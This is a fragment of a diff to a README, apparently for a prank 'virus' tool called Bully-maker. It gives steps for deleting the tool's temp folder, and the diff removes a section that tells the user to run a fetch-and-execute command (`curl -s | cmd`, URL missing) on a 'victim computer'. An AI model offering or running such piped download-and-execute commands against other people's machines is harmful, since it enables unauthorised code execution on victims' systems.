savyasaachi-v/Bully-maker/README.md

 3) How to uninstall the virus?<br>
 A) Go to the temp folder by typing `cd %tmp%` and delete the folder named bully by running `rmdir /s bully`

-## Miscellaneous
-If you do not wish to use a pendrive and the victim computer has internet connection you can also run the below command in cmd

-`curl -s | cmd`